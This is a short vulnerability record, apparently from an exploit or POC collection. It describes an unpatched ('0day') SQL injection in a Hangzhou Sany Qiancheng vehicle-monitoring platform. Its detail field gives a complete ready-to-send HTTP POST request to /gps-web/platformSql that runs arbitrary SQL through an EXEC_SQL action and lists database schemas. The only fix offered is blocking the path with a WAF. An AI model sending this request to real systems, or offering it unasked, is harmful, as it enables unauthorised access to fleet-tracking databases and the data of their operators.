vendor = "三一谦成"
name = "杭州三一谦成科技 车辆监控服务平台SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/gps-web/platformSql"
detail = "POST /gps-web/platformSql HTTP/1.1 Host: User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 74 action=EXEC_SQL&params=SELECT schema_name FROM information_schema.schemata"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "0day"
